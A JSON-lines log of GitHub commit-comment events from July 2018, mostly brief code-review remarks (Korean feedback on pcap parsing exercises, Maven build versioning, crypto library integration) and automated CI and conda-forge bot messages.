{"id":"8034553209","type":"CommitCommentEvent","actor":{"login":"solardiz"},"repo":{"name":"cryptozeny/bitzeny"},"payload":{"comment":{"id":29876764,"position":null,"line":null,"path":null,"commit_id":"ea21675aab1b507de0815ab61202b50aa15c469e","created_at":"2018-07-29T20:01:06Z","updated_at":"2018-07-29T20:01:06Z","author_association":"NONE","body":"@cryptozeny I don't immediately see why it'd crash. You'll need to debug this.\r\n\r\nUnrelated: I suggest that you call the directory just yespower (without the version number, which in your case is wrong anyway since the code is from version 1.0) and put your wrapper file/function outside of that directory."}},"created_at":"2018-07-29T20:01:06Z"}
{"id":"8034553749","type":"CommitCommentEvent","actor":{"login":"Alex7Li"},"repo":{"name":"EigenPro/scikit-learn"},"payload":{"comment":{"id":29876768,"position":null,"line":null,"path":null,"commit_id":"5636dc0fdc846444464c7dde52aba0100bf4b8fd","created_at":"2018-07-29T20:01:25Z","updated_at":"2018-07-29T20:01:25Z","author_association":"COLLABORATOR","body":"Not sure what happened in estimator_checks that made everything appear to be deleted and re-added. I only changed 1 line: adding it as a mutli-output classifier"}},"created_at":"2018-07-29T20:01:25Z"}
{"id":"8034555169","type":"CommitCommentEvent","actor":{"login":"CreativePigGR"},"repo":{"name":"corytortoise/PvPLevels"},"payload":{"comment":{"id":29876771,"position":null,"line":null,"path":null,"commit_id":"4071de6150b5ba333548515cb674a38f6b3803d8","created_at":"2018-07-29T20:02:28Z","updated_at":"2018-07-29T20:02:28Z","author_association":"NONE","body":"Api version?"}},"created_at":"2018-07-29T20:02:28Z"}
{"id":"8034555513","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"serinchu/pcap_parsing"},"payload":{"comment":{"id":29876773,"position":134,"line":134,"path":"final.cpp","commit_id":"180f50a60fd23a7380ff3a566ed9790645576d61","created_at":"2018-07-29T20:02:44Z","updated_at":"2018-07-29T20:02:44Z","author_association":"NONE","body":"아래 for문을 돌리기 위해 사용되는 print_data_len의 값은 항상 16인가요?"}},"created_at":"2018-07-29T20:02:44Z"}
{"id":"8034556831","type":"CommitCommentEvent","actor":{"login":"ShmooDude"},"repo":{"name":"Sidoine/Ovale"},"payload":{"comment":{"id":29876780,"position":null,"line":null,"path":null,"commit_id":"a1b0ceb9d5ab6041dfd83fee2c03aaa24f7b4795","created_at":"2018-07-29T20:03:40Z","updated_at":"2018-07-29T20:03:40Z","author_association":"CONTRIBUTOR","body":"I've been wanting to do this for a while but I just don't have the programming knowhow to do it.  Hope you can get it working as it'd greatly simplify things. :)"}},"created_at":"2018-07-29T20:03:40Z"}
{"id":"8034557970","type":"CommitCommentEvent","actor":{"login":"khuongduy1110"},"repo":{"name":"AnemoneTeam/Anemone"},"payload":{"comment":{"id":29876789,"position":null,"line":null,"path":null,"commit_id":"6565e25c44c98a2af86b7c0c6c2178dcbf39a683","created_at":"2018-07-29T20:04:29Z","updated_at":"2018-07-29T20:04:29Z","author_association":"NONE","body":"6565e25"}},"created_at":"2018-07-29T20:04:29Z"}
{"id":"8034558037","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"serinchu/pcap_parsing"},"payload":{"comment":{"id":29876790,"position":121,"line":121,"path":"final.cpp","commit_id":"180f50a60fd23a7380ff3a566ed9790645576d61","created_at":"2018-07-29T20:04:32Z","updated_at":"2018-07-29T20:04:32Z","author_association":"NONE","body":"함수를 호출할 때에는 함수명 앞뒤에 괄호를 치지 않는 것이 보통입니다."}},"created_at":"2018-07-29T20:04:32Z"}
{"id":"8034558450","type":"CommitCommentEvent","actor":{"login":"Jalleo"},"repo":{"name":"DDMers/StarTrek13"},"payload":{"comment":{"id":29876793,"position":null,"line":null,"path":null,"commit_id":"16a96332934fc746aa24b72b6fb0649f413cc23b","created_at":"2018-07-29T20:04:49Z","updated_at":"2018-07-29T20:04:49Z","author_association":"CONTRIBUTOR","body":"I thought I fixed that....."}},"created_at":"2018-07-29T20:04:49Z"}
{"id":"8034559370","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"serinchu/pcap_parsing"},"payload":{"comment":{"id":29876800,"position":146,"line":146,"path":"final.cpp","commit_id":"180f50a60fd23a7380ff3a566ed9790645576d61","created_at":"2018-07-29T20:05:27Z","updated_at":"2018-07-29T20:05:27Z","author_association":"NONE","body":"마지막 줄에는 엔터를 쳐 빈 한 라인을 추가해 주시기 바랍니다."}},"created_at":"2018-07-29T20:05:27Z"}
{"id":"8034560424","type":"CommitCommentEvent","actor":{"login":"Kagami"},"repo":{"name":"Jurevic/go-face"},"payload":{"comment":{"id":29876802,"position":5,"line":5,"path":"face.go","commit_id":"fc3d3fa6a0c760d9617004eb6af2ab28eabebb1d","created_at":"2018-07-29T20:06:12Z","updated_at":"2018-07-29T20:06:12Z","author_association":"NONE","body":"I'm curious, what distro/dlib package do you use?\r\nRight now I'm trying to make it as cross-distributive as possible and think that `dlib-1.pc` with `Libs: -lblas -llapack` should work best in your case."}},"created_at":"2018-07-29T20:06:12Z"}
{"id":"8034561140","type":"CommitCommentEvent","actor":{"login":"thomascube"},"repo":{"name":"roundcube/roundcubemail"},"payload":{"comment":{"id":29876805,"position":null,"line":null,"path":null,"commit_id":"0c9494cede65ba7ebc35e91d065c6e2b8a9fac11","created_at":"2018-07-29T20:06:40Z","updated_at":"2018-07-29T20:06:40Z","author_association":"MEMBER","body":"Thanks a lot! That's pretty much what I already checked with this commit. See https://github.com/roundcube/roundcubemail/blob/0c9494cede65ba7ebc35e91d065c6e2b8a9fac11/skins/elastic/images/roundcube-logo-elastic.svg and https://github.com/roundcube/roundcubemail/blob/0c9494cede65ba7ebc35e91d065c6e2b8a9fac11/skins/elastic/images/roundcube-watermark.svg"}},"created_at":"2018-07-29T20:06:40Z"}
{"id":"8034561401","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29876807,"position":112,"line":1242,"path":"pom.xml","commit_id":"5111b0be159e7248721930bb48ceff596bd5051b","created_at":"2018-07-29T20:06:51Z","updated_at":"2018-07-29T20:06:51Z","author_association":"CONTRIBUTOR","body":"Do you have a *new* POM branch? In any case, I'm expecting `RefactorNSIS` to be merged before `POM`, so I wanted it to be updated.\r\n\r\nI agree that we should have the version in the target files, I thought you were the one that didn't want that since I've seen you remove it for other things (like RPM, DEB etc packages). I think we should always have the version for all downloadable files to make it less confusing for everybody. I often have to rename them manually, and it seems kind of pointless :wink: "}},"created_at":"2018-07-29T20:06:51Z"}
{"id":"8034561551","type":"CommitCommentEvent","actor":{"login":"RetroSven"},"repo":{"name":"libretro/RetroArch"},"payload":{"comment":{"id":29876808,"position":null,"line":null,"path":null,"commit_id":"7131b969d887fc61d510b28eeb273486cdedf210","created_at":"2018-07-29T20:06:58Z","updated_at":"2018-07-29T20:06:58Z","author_association":"CONTRIBUTOR","body":"noted thanks"}},"created_at":"2018-07-29T20:06:58Z"}
{"id":"8034564008","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29876816,"position":112,"line":1242,"path":"pom.xml","commit_id":"5111b0be159e7248721930bb48ceff596bd5051b","created_at":"2018-07-29T20:08:42Z","updated_at":"2018-07-29T20:08:42Z","author_association":"CONTRIBUTOR","body":"That said, as this branch can't currently be rebased, you can just add a new commit with the change."}},"created_at":"2018-07-29T20:08:42Z"}
{"id":"8034564133","type":"CommitCommentEvent","actor":{"login":"gneginskiy"},"repo":{"name":"nmice/Task"},"payload":{"comment":{"id":29876817,"position":7,"line":27,"path":"src/main/java/week07/EqualsTestDrive.java","commit_id":"7c3ef83cbab3fcdcd56d256c6084e1b1cb1ab564","created_at":"2018-07-29T20:08:48Z","updated_at":"2018-07-29T20:08:48Z","author_association":"COLLABORATOR","body":"wtf"}},"created_at":"2018-07-29T20:08:48Z"}
{"id":"8034564694","type":"CommitCommentEvent","actor":{"login":"AlexeySRC"},"repo":{"name":"AlexeySRC/PHP"},"payload":{"comment":{"id":29876826,"position":null,"line":null,"path":null,"commit_id":"e39e1470c872797eb9ee99d6b52fabbbd1e19492","created_at":"2018-07-29T20:09:13Z","updated_at":"2018-07-29T20:09:13Z","author_association":"OWNER","body":"Вычисление факториала"}},"created_at":"2018-07-29T20:09:13Z"}
{"id":"8034564736","type":"CommitCommentEvent","actor":{"login":"ashish1997it"},"repo":{"name":"ashish1997it/code-magic"},"payload":{"comment":{"id":29876827,"position":null,"line":null,"path":null,"commit_id":"edf35ea0e66ada8280d199e031e777a87079cd93","created_at":"2018-07-29T20:09:15Z","updated_at":"2018-07-29T20:09:15Z","author_association":"OWNER","body":"Ones at Time"}},"created_at":"2018-07-29T20:09:15Z"}
{"id":"8034566250","type":"CommitCommentEvent","actor":{"login":"RetroSven"},"repo":{"name":"libretro/RetroArch"},"payload":{"comment":{"id":29876832,"position":null,"line":null,"path":null,"commit_id":"7131b969d887fc61d510b28eeb273486cdedf210","created_at":"2018-07-29T20:10:23Z","updated_at":"2018-07-29T20:10:23Z","author_association":"CONTRIBUTOR","body":"works the same - thanks"}},"created_at":"2018-07-29T20:10:23Z"}
{"id":"8034566455","type":"CommitCommentEvent","actor":{"login":"scamille"},"repo":{"name":"simulationcraft/simc"},"payload":{"comment":{"id":29876834,"position":null,"line":null,"path":null,"commit_id":"ae005ee6c7554f56dc7deeb227a5f68de612e148","created_at":"2018-07-29T20:10:30Z","updated_at":"2018-07-29T20:10:30Z","author_association":"MEMBER","body":"Hum I just realized the problem was Black Ox Brew not being executed properly.\r\n\r\nBut I think we can live with a somewhat more conservative APL (no dps loss) and tune this back to perfection with 120."}},"created_at":"2018-07-29T20:10:30Z"}
{"id":"8034566932","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"moon2263/packet_capture"},"payload":{"comment":{"id":29876835,"position":103,"line":146,"path":"main.cpp","commit_id":"a6fba5ae62cbf39cc9543422c20d781a83b62193","created_at":"2018-07-29T20:10:50Z","updated_at":"2018-07-29T20:10:50Z","author_association":"NONE","body":"show_data 함수 interface를 다음과 같이 하는 건 아떨까요? \r\nvoid show_data(u_char * data, int size);\r\n굳이 total_len, ip_tcp_offset, tcp_data_offset 변수를 파라미터로 넘길 필요는 없을 것 같은데요?"}},"created_at":"2018-07-29T20:10:50Z"}
{"id":"8034568901","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"iRainDropYT/Austin5511"},"payload":{"comment":{"id":29876836,"position":null,"line":null,"path":null,"commit_id":"678ed80e9b114c82ec2d5cf5e2936affb23a829c","created_at":"2018-07-29T20:12:12Z","updated_at":"2018-07-29T20:12:12Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 6\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/iRainDropYT/Austin5511/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `ac5b92ea-936b-11e8-9268-9ce81c0eaaae`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-29T20:12:12Z"}
{"id":"8034569367","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"iRainDropYT/Austin5511"},"payload":{"comment":{"id":29876841,"position":null,"line":null,"path":null,"commit_id":"bf6dd40f50ff05d6318c8495212975f375c7d4a1","created_at":"2018-07-29T20:12:31Z","updated_at":"2018-07-29T20:12:31Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 6\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/iRainDropYT/Austin5511/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `b7b2cd66-936b-11e8-9e01-27bd4e537f3a`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-29T20:12:31Z"}
{"id":"8034570023","type":"CommitCommentEvent","actor":{"login":"ashish1997it"},"repo":{"name":"ashish1997it/code-magic"},"payload":{"comment":{"id":29876844,"position":null,"line":null,"path":null,"commit_id":"edf35ea0e66ada8280d199e031e777a87079cd93","created_at":"2018-07-29T20:12:58Z","updated_at":"2018-07-29T20:12:58Z","author_association":"OWNER","body":"Ones at Time ;)"}},"created_at":"2018-07-29T20:12:58Z"}
{"id":"8034570190","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"iRainDropYT/All"},"payload":{"comment":{"id":29876845,"position":null,"line":null,"path":null,"commit_id":"ebb8cbb1dca50bfe96ec4a18f50776f4585015c0","created_at":"2018-07-29T20:13:05Z","updated_at":"2018-07-29T20:13:05Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 6\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/iRainDropYT/All/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `cc220fe6-936b-11e8-9480-639a34eb256c`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-29T20:13:05Z"}
{"id":"8034571078","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29876846,"position":64,"line":64,"path":"src/homeTasks/lesson9/task2/Student.java","commit_id":"8833a6792816d3e7c9cb197723c8a847d11668ee","created_at":"2018-07-29T20:13:40Z","updated_at":"2018-07-29T20:13:40Z","author_association":"NONE","body":"а если не равно? зачем опять вызывать то же самое сравнение?"}},"created_at":"2018-07-29T20:13:40Z"}
{"id":"8034572535","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29876856,"position":112,"line":1242,"path":"pom.xml","commit_id":"5111b0be159e7248721930bb48ceff596bd5051b","created_at":"2018-07-29T20:14:37Z","updated_at":"2018-07-29T20:14:37Z","author_association":"CONTRIBUTOR","body":"Pointless yes.\r\nNo, the version should be in all the other builds in the actual POM branch.\r\nAt first i just thought that it was the Windows way to distribute the binary, it why i have done that this way."}},"created_at":"2018-07-29T20:14:37Z"}
{"id":"8034574336","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29876863,"position":112,"line":1242,"path":"pom.xml","commit_id":"5111b0be159e7248721930bb48ceff596bd5051b","created_at":"2018-07-29T20:15:49Z","updated_at":"2018-07-29T20:15:49Z","author_association":"CONTRIBUTOR","body":"That said i don't remember the original Windows build have the version number included."}},"created_at":"2018-07-29T20:15:49Z"}
{"id":"8034574411","type":"CommitCommentEvent","actor":{"login":"pulkit24"},"repo":{"name":"pulkit24/ToME"},"payload":{"comment":{"id":29876864,"position":null,"line":null,"path":null,"commit_id":"98bceec599100a04bb6091bad18c96177caee9ce","created_at":"2018-07-29T20:15:52Z","updated_at":"2018-07-29T20:15:52Z","author_association":"OWNER","body":"@mehmetyasararas Thanks for reporting. Just uploaded a fixed version. Can you please try downloading the mod and trying again? \r\nLet me know how you go. "}},"created_at":"2018-07-29T20:15:52Z"}
{"id":"8034575083","type":"CommitCommentEvent","actor":{"login":"cryptozeny"},"repo":{"name":"cryptozeny/bitzeny"},"payload":{"comment":{"id":29876865,"position":10,"line":10,"path":"src/crypto/yespower-0.5/yespower.c","commit_id":"ea21675aab1b507de0815ab61202b50aa15c469e","created_at":"2018-07-29T20:16:21Z","updated_at":"2018-07-29T20:16:21Z","author_association":"OWNER","body":"@solardiz thanks to comment! :+1:  but how to check the return value? i don't know well as you... could you give me the code? :sweat_smile: "}},"created_at":"2018-07-29T20:16:21Z"}
{"id":"8034575715","type":"CommitCommentEvent","actor":{"login":"Kalaborative"},"repo":{"name":"Kalaborative/survivio-cheat"},"payload":{"comment":{"id":29876867,"position":null,"line":null,"path":null,"commit_id":"ae27e5cbb40df537cf6e1352a7a70fdbd9450c5c","created_at":"2018-07-29T20:16:52Z","updated_at":"2018-07-29T20:16:52Z","author_association":"OWNER","body":"#7 "}},"created_at":"2018-07-29T20:16:52Z"}
{"id":"8034576628","type":"CommitCommentEvent","actor":{"login":"mths0x5f"},"repo":{"name":"wix/react-native-navigation"},"payload":{"comment":{"id":29876869,"position":37,"line":195,"path":"lib/android/app/src/main/java/com/reactnativenavigation/viewcontrollers/stack/StackController.java","commit_id":"2c54caa073276f7325cb396cd001a6fcc9ccadde","created_at":"2018-07-29T20:17:31Z","updated_at":"2018-07-29T20:17:31Z","author_association":"NONE","body":"This line should be `Options resolvedOptions = resolveCurrentOptions(presenter.getDefaultOptions());`, otherwise default pop animations won't be applied."}},"created_at":"2018-07-29T20:17:31Z"}
{"id":"8034576956","type":"CommitCommentEvent","actor":{"login":"homes32"},"repo":{"name":"pebakery/pebakery"},"payload":{"comment":{"id":29876870,"position":null,"line":null,"path":null,"commit_id":"a128538dde2589df2fc8c27f7428de24c0661bbb","created_at":"2018-07-29T20:17:45Z","updated_at":"2018-07-29T20:17:45Z","author_association":"MEMBER","body":"See also #76"}},"created_at":"2018-07-29T20:17:45Z"}
{"id":"8034577105","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/conda-smithy-feedstock"},"payload":{"comment":{"id":29876873,"position":null,"line":null,"path":null,"commit_id":"93c80f87041c6f1ec8da952c7b0e2aec7afd4ee3","created_at":"2018-07-29T20:17:52Z","updated_at":"2018-07-29T20:17:52Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @isuruf-bot was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-29T20:17:52Z"}
{"id":"8034577385","type":"CommitCommentEvent","actor":{"login":"joanroig"},"repo":{"name":"meinert/InstaPy"},"payload":{"comment":{"id":29876874,"position":null,"line":null,"path":null,"commit_id":"0ab19ddd5775e0d194e6426560ff52892c1e519f","created_at":"2018-07-29T20:18:06Z","updated_at":"2018-07-29T20:18:06Z","author_association":"NONE","body":"@meinert I think line 282 should be updated too."}},"created_at":"2018-07-29T20:18:06Z"}
{"id":"8034577754","type":"CommitCommentEvent","actor":{"login":"homes32"},"repo":{"name":"pebakery/pebakery"},"payload":{"comment":{"id":29876876,"position":null,"line":null,"path":null,"commit_id":"bdd1fb1aa024c4a6d24f7daf64f1e64cf78f997c","created_at":"2018-07-29T20:18:24Z","updated_at":"2018-07-29T20:18:24Z","author_association":"MEMBER","body":"See also #76"}},"created_at":"2018-07-29T20:18:24Z"}
{"id":"8034578011","type":"CommitCommentEvent","actor":{"login":"cryptozeny"},"repo":{"name":"cryptozeny/bitzeny"},"payload":{"comment":{"id":29876879,"position":null,"line":null,"path":null,"commit_id":"ea21675aab1b507de0815ab61202b50aa15c469e","created_at":"2018-07-29T20:18:37Z","updated_at":"2018-07-29T20:18:37Z","author_association":"OWNER","body":"@solardiz I'll try again! :+1: "}},"created_at":"2018-07-29T20:18:37Z"}
{"id":"8034579506","type":"CommitCommentEvent","actor":{"login":"jt1056"},"repo":{"name":"jt1056/chrom.io"},"payload":{"comment":{"id":29876890,"position":null,"line":null,"path":null,"commit_id":"c7ac1e1e038ef8571ae6f6c4fb01168169a4a47c","created_at":"2018-07-29T20:19:49Z","updated_at":"2018-07-29T20:19:49Z","author_association":"OWNER","body":"#"}},"created_at":"2018-07-29T20:19:49Z"}
{"id":"8034579564","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-tidygraph-feedstock"},"payload":{"comment":{"id":29876891,"position":null,"line":null,"path":null,"commit_id":"fefa51194cafa090de0092058d34b99722fe41ab","created_at":"2018-07-29T20:19:50Z","updated_at":"2018-07-29T20:19:50Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @nick-youngblut was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-29T20:19:50Z"}
{"id":"8034579681","type":"CommitCommentEvent","actor":{"login":"gvreuls"},"repo":{"name":"gvreuls/Stockfish"},"payload":{"comment":{"id":29876892,"position":null,"line":null,"path":null,"commit_id":"6c4f168655bb5129f64098528731f9fa0199a9ff","created_at":"2018-07-29T20:19:55Z","updated_at":"2018-07-29T20:19:55Z","author_association":"OWNER","body":"I'm afraid those warnings are a mingw/msys2 bug. I could probably build in another exception for msys2 but at this point I'm starting to worry about the added complexity in the Makefile. Maybe this wasn't a good idea after all."}},"created_at":"2018-07-29T20:19:55Z"}
{"id":"8034582249","type":"CommitCommentEvent","actor":{"login":"drudesign"},"repo":{"name":"roundcube/roundcubemail"},"payload":{"comment":{"id":29876907,"position":null,"line":null,"path":null,"commit_id":"0c9494cede65ba7ebc35e91d065c6e2b8a9fac11","created_at":"2018-07-29T20:21:47Z","updated_at":"2018-07-29T20:21:47Z","author_association":"NONE","body":"@thomascube , if you look closely there is a slight difference in perspective between what is uploaded and what I've sent. I know it isn't much in general, but it's huge for a designer ;) cheers!"}},"created_at":"2018-07-29T20:21:47Z"}
{"id":"8034582323","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29876908,"position":112,"line":1242,"path":"pom.xml","commit_id":"5111b0be159e7248721930bb48ceff596bd5051b","created_at":"2018-07-29T20:21:51Z","updated_at":"2018-07-29T20:21:51Z","author_association":"CONTRIBUTOR","body":"Yes a new POM branch forked from the already existing one when i'm working on release and website.\r\nYes, i also wanted NSIS work be merged first, as the POM branch will need more time to get all the work and plugins enhancements waited from their developper.\r\n\r\nI was right, not my fault ;P\r\n`<outputFile>${project.build.directory}/UMS-setup.exe</outputFile>`"}},"created_at":"2018-07-29T20:21:51Z"}
{"id":"8034582656","type":"CommitCommentEvent","actor":{"login":"zuhairtaha"},"repo":{"name":"zuhairtaha/week6hw"},"payload":{"comment":{"id":29876909,"position":22,"line":22,"path":"app.js","commit_id":"2811a5db7fdd898fcaf2a5eb428ab2c4f503af63","created_at":"2018-07-29T20:22:04Z","updated_at":"2018-07-29T20:22:04Z","author_association":"OWNER","body":"@pankaj28843 \r\nThank you for the important information. I will try to comply with this in the coming times.\r\nPerhaps I wrote it this way because I am used to writing variables (properties) at the beginning of class declaration in other programming languages such as C#. But now I understand your point of view. You are right, this is better to make the code reusable and more understandable."}},"created_at":"2018-07-29T20:22:04Z"}
{"id":"8034596878","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"ksh95216/pcap_test"},"payload":{"comment":{"id":29876971,"position":97,"line":97,"path":"main.cpp","commit_id":"a3d0658e16aee5b0676343d0e2f07a72429cdb0c","created_at":"2018-07-29T20:32:27Z","updated_at":"2018-07-29T20:32:27Z","author_association":"NONE","body":"ether_type은 코드상에서 의미론적으로 0x0008이 아닌 0x0800과 비교가 되어야 합니다."}},"created_at":"2018-07-29T20:32:27Z"}
{"id":"8034597262","type":"CommitCommentEvent","actor":{"login":"pprindeville"},"repo":{"name":"azat/libevent"},"payload":{"comment":{"id":29876972,"position":null,"line":null,"path":null,"commit_id":"6efaf10d8548cc3a4ac23b587209cac2b33ae32f","created_at":"2018-07-29T20:32:44Z","updated_at":"2018-07-29T20:32:44Z","author_association":"NONE","body":"This looks good.  I assume it works (I don't know much about `cmake`).  Is it going to be merged?\r\n"}},"created_at":"2018-07-29T20:32:44Z"}
{"id":"8034597308","type":"CommitCommentEvent","actor":{"login":"MaximillianJLowe"},"repo":{"name":"MaximillianJLowe/bloc-jams-react"},"payload":{"comment":{"id":29876973,"position":null,"line":null,"path":null,"commit_id":"e958c33694c500011f4d6773e5378eaf103e1106","created_at":"2018-07-29T20:32:47Z","updated_at":"2018-07-29T20:32:47Z","author_association":"OWNER","body":"Rename commit to \"checkpoint 2 configuration: complete\" "}},"created_at":"2018-07-29T20:32:47Z"}
{"id":"8034597691","type":"CommitCommentEvent","actor":{"login":"a3f"},"repo":{"name":"raysan5/raylib"},"payload":{"comment":{"id":29876974,"position":null,"line":null,"path":null,"commit_id":"b588af5ce22691bb143dcd784858e3c331c4a1e6","created_at":"2018-07-29T20:33:04Z","updated_at":"2018-07-29T20:33:04Z","author_association":"COLLABORATOR","body":"I have submitted a PR upstream (https://github.com/glfw/glfw/pull/1307) with the changes I made here."}},"created_at":"2018-07-29T20:33:04Z"}
{"id":"8034597737","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29876975,"position":112,"line":1242,"path":"pom.xml","commit_id":"5111b0be159e7248721930bb48ceff596bd5051b","created_at":"2018-07-29T20:33:07Z","updated_at":"2018-07-29T20:33:07Z","author_association":"CONTRIBUTOR","body":"I never said it was you \"fault\", I know that UMS didn't use to have the version numbers included, but I think it's a much better idea to have them included. I've been wanting to suggest it for a while, but I had to wait until you were in a good mood because I assumed that you wouldn't agree because you had removed them for the other builds. So, it's really nothing to discuss, we actually agree :wink: "}},"created_at":"2018-07-29T20:33:07Z"}
{"id":"8034598357","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"ksh95216/pcap_test"},"payload":{"comment":{"id":29876976,"position":89,"line":89,"path":"main.cpp","commit_id":"a3d0658e16aee5b0676343d0e2f07a72429cdb0c","created_at":"2018-07-29T20:33:32Z","updated_at":"2018-07-29T20:33:32Z","author_association":"NONE","body":"packet 변수의 변경(IP Header를 가리키도록 하는)은 ether_type의 확인 이후로 바꾸시기 바랍니다."}},"created_at":"2018-07-29T20:33:32Z"}
{"id":"8034599639","type":"CommitCommentEvent","actor":{"login":"HKOYES"},"repo":{"name":"geeeeeeeeek/WeChatLuckyMoney"},"payload":{"comment":{"id":29876979,"position":null,"line":null,"path":null,"commit_id":"21fb800ce5b5a8c05f784b04017b45005219f5e9","created_at":"2018-07-29T20:34:31Z","updated_at":"2018-07-29T20:34:31Z","author_association":"NONE","body":"能不能写一个刺激战场除草的apk"}},"created_at":"2018-07-29T20:34:31Z"}
{"id":"8034599895","type":"CommitCommentEvent","actor":{"login":"emilionavarro"},"repo":{"name":"emilionavarro/objectifi"},"payload":{"comment":{"id":29876984,"position":null,"line":null,"path":null,"commit_id":"a640279158ce65310d385cf7edef80278ebbff38","created_at":"2018-07-29T20:34:44Z","updated_at":"2018-07-29T20:34:44Z","author_association":"OWNER","body":"Good catch"}},"created_at":"2018-07-29T20:34:44Z"}
{"id":"8034600146","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"ksh95216/pcap_test"},"payload":{"comment":{"id":29876985,"position":113,"line":113,"path":"main.cpp","commit_id":"a3d0658e16aee5b0676343d0e2f07a72429cdb0c","created_at":"2018-07-29T20:34:56Z","updated_at":"2018-07-29T20:34:56Z","author_association":"NONE","body":"TCP Data의 길이가 16보다 작을 때에는 for문에서 16번 돌려서는 안됩니다. min(tcp_data_len, 16)만큼 반복하시기 바랍니다."}},"created_at":"2018-07-29T20:34:56Z"}
